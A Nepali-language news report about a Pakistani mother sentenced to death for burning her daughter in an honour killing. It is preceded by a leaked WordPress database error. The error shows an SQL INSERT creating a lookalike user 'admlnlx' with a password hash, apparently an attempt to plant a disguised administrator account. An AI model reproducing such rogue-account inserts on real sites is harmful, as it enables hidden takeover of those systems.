WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAYdG0xTJB7Jmd4UL.d/dDhbPRIQp/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 17:12:43', '', 'admlnlx', 'admlnlx')
इस्लामाबाद,माघ ५-
आफ्नो छोरीलाई जिउँदै जलाएको आरोपमा पाकिस्तानमा एक महिलालाई मृत्युदण्डको सजाय सुनाइएको छ ।
प्रविन बिबीले लाहोरमा रहेको अदालतमा ‘आफ्नो छोरीले परिवारको साख गिराएको’ भन्दै उनलाई जलाएको स्वीकार गरेको प्रहरी प्रवक्ता नबिला घजानाफरले सिएनएनलाई बताइन् ।
प्रविनका छोरा अहमर रफिकलाई अपराधमा संलग्न रहेको आरोपमा आजीवन कारावासको सजाय सुनाइएको छ ।सन् २०१६ को जुनमा १८ वर्षीय जिनत रफिकलाई उनको आमा र दाजु मिलेर आगो लगाई हत्या गरेका थिए । उनमाथि परिवारको मर्जीविपरित युवकसँग प्रेम गरेर भागेको आरोप लगाइएको थियो ।
जिनत आफ्नो पतिसँग एक महिना बसेपछि लाहोरस्थित आफ्नो घरमा आमासँग भेट्न र सम्झाउन फर्किएकी थिइन् ।

तर, उनी घर पुग्ने बित्तिकै उनको आमा र दाजुले कुटपिट गर्दै खाटमा बाँधेर पेट्रोल छर्केर आगो लगाइदिएका थिए ।

प्रविनले प्रहरीसमक्ष आत्मसमर्पण गरे पनि आफ्नो कार्यप्रति कुनै पश्चताप नभएको बताएकी थिइन् ।गत अक्टोबरदेखि यस्तो ‘अनर किलिङ’ बारे नयाँ कानुन लागु भएको छ । जस अन्तरगत प्रविन वा उनको छोरा माफीका लागि योग्य हुनेछैनन् ।परिवारका सदस्यले माफी दिए पनि उनीहरुले पूरै सजाय भोग्नुपर्नेछ ।